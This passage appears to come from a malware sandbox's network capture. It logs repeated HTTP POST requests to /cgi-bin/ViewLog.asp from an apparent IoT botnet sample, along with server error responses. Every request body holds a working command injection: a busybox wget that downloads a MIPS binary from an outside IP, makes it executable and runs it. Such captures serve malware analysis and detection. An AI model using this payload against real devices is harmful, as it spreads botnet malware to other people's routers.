                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.651537895 CET702INHTTP/1.1 404 Not Found
                                              Cache-Control: must-revalidate,no-cache,no-store
                                              Content-Type: text/html;charset=iso-8859-1
                                              Content-Length: 462
                                              Server: Jetty(9.4.31.v20200723)
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 68 72 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 65 63 6c 69 70 73 65 2e 6f 72 67 2f 6a 65 74 74 79 22 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 20 39 2e 34 2e 33 31 2e 76 32 30 32 30 30 37 32 33 3c 2f 61 3e 3c 68 72 2f 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table><hr><a href="http://eclipse.org/jetty">Powered by Jetty:// 9.4.31.v20200723</a><hr/></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              691192.168.2.143587695.86.100.528080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:10.429843903 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              692192.168.2.144318694.230.246.798080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:10.998234987 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.288954020 CET367INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              693192.168.2.144743094.123.186.2278080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:11.199757099 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              694192.168.2.145971494.120.229.1888080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:11.210814953 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              695192.168.2.144024285.239.227.1668080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:11.425781965 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.577172041 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.790525913 CET702INHTTP/1.1 404 Not Found
                                              Cache-Control: must-revalidate,no-cache,no-store
                                              Content-Type: text/html;charset=iso-8859-1
                                              Content-Length: 462
                                              Server: Jetty(9.4.31.v20200723)
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 3c 68 72 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 65 63 6c 69 70 73 65 2e 6f 72 67 2f 6a 65 74 74 79 22 3e 50 6f 77 65 72 65 64 20 62 79 20 4a 65 74 74 79 3a 2f 2f 20 39 2e 34 2e 33 31 2e 76 32 30 32 30 30 37 32 33 3c 2f 61 3e 3c 68 72 2f 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><title>Error 404 Not Found</title></head><body><h2>HTTP ERROR 404 Not Found</h2><table><tr><th>URI:</th><td>/cgi-bin/ViewLog.asp</td></tr><tr><th>STATUS:</th><td>404</td></tr><tr><th>MESSAGE:</th><td>Not Found</td></tr><tr><th>SERVLET:</th><td>default</td></tr></table><hr><a href="http://eclipse.org/jetty">Powered by Jetty:// 9.4.31.v20200723</a><hr/></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              696192.168.2.145880262.29.3.1178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.306099892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              697192.168.2.144261494.121.64.978080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.540117979 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              698192.168.2.143757431.40.227.1188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:12.665128946 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.880783081 CET1340INHTTP/1.0 400 Bad Request
                                              Server: squid/3.1.23
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 03:49:05 GMT
                                              Content-Type: text/html
                                              Content-Length: 3167
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              699192.168.2.144599094.122.63.2198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.127999067 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              700192.168.2.144596494.121.176.1048080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.251843929 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              701192.168.2.145963462.72.166.998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.311794996 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:13.731007099 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              702192.168.2.145933695.164.243.1138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:13.359743118 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
